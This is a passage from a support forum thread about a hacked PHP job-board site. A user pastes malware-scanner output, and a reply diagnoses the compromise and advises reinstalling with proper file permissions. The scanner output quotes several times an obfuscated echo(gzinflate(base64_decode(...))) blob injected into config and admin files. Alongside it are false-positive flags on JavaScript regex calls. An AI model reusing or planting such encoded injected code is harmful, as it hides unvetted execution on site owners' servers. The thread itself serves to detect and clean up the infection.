 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (execution of a shell command) /home/jobsb73/public_html/include/lib/scw/scw_js_with_comments.php on line 976:
 if (scwExpValYear.exec(scwArrSeed[0]) == null ||
Possibly bad code (execution of a shell command) /home/jobsb73/public_html/include/lib/scw/scw_js_with_comments.php on line 977:
 scwExpValMonth.exec(scwArrSeed[1]) == null ||
Possibly bad code (execution of a shell command) /home/jobsb73/public_html/include/lib/scw/scw_js_with_comments.php on line 978:
 scwExpValDay.exec(scwArrSeed[2]) == null
Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/config-default.php on line 320:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/admin/main.php on line 157:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/admin/index.php on line 11:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Found 13 threats. Please discuss this on the forum (Opens in a new window)


It looks like your site was compromised by hackers.

Most likely, the file permissions allowed the hackers to write (inject code) to your site. Now your site has malware.

Best if you delete the whole site and install new Job Board from scratch. BUT make sure that the permissions are set properly this time!
Logged

SECURE your site BEFORE you wish you had! Use plugins by COLOSSAL MIND!
Pages: 1 2 [3] Print 
« previous next »
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2013, Simple Machines Valid XHTML 1.0! Valid CSS!
Page created in 0.21 seconds with 17 queries.